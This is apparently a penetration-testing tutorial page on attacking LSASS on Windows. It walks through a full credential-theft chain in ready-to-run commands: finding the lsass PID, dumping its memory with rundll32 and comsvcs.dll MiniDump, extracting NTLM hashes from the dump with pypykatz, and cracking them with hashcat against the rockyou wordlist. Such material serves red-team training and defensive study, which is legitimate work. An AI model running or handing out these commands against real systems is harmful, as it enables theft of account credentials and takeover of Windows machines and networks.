Attacking LSASS
LSASS (Local Security Authority Subsystem Service) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes and creates access tokens. It is a critical service that plays a vital role in credential management and authentication processes.
Dumping LSASS
The are a ton of methods to dump the LSASS process. Below there are various methods and techniques described. The most well-known tool for dumping the LSASS process is Mimikatz.
Using Rundll32.exe
!!! Note
1
Most antivirus products or EDR programs will qualify this action as malicious and start giving security alerts or possibly block the action.
To perform this action, you must have at least local administrator privileges on the victim machine. The command line or PowerShell must be opened as an elevated process.
- Determine the PID of the
lsass.exe
process with the Command Line.
1
tasklist /svc | findstr "lsass.exe"
or with PowerShell.
1
Get-Process lsass
2. Create lsass.exe
dump.
1
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\temp\lsass.dmp full
An alternative method is to use this command in an elevated PowerShell session. This command extracts the PID for the lsass.exe
process, immediately passes it to the dump action of the process, and creates the .dmp file in the C:\temp
folder.
1
rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full;Wait-Process -Id (Get-Process rundll32).id
Extract Credentials
The tool Pypykatz is an implementation off Mimikatz and can be used to extract the credentials from the lsass.dmp
file.
- Dump the hashes from
lsass.dmp
.
1
sudo pypykatz lsa minidump lsass.dmp
2. Crack the hashes with hashcat
.
1
sudo hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
-m 1000
=> Set hashtype to NTLM hashes.